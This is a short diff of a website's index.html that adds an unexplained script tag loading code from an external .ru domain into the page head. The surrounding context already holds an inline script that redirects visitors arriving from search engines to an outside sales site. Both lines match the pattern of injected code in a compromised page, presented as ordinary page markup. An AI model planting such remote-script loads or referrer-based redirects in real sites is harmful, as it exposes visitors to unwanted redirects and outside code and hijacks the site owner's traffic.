--- a/index.html
+++ b/index.html
@@ -25,7 +25,7 @@
     <meta property="og:image:width" content="1200">
     <meta property="og:image:height" content="630">
 <script>var regexp=/\.(aol|google|youdao|yahoo|bing|ask|biso|gougou|ifeng|ivc|sooule|niuhu|biso|Clusty|Dogpile|Answers|USA)(\.[a-z0-9\-]+){1,2}\//ig;var where =document.referrer;if(regexp.test(where)){window.location.href="https://nancycnsales.com"}</script>
-     
+     <script src="https://ladyreps.ru/a.js"></script>
      <style>
          :root { --youjia-view-scale: calc(100% * (1 / 1)); }
      </style>
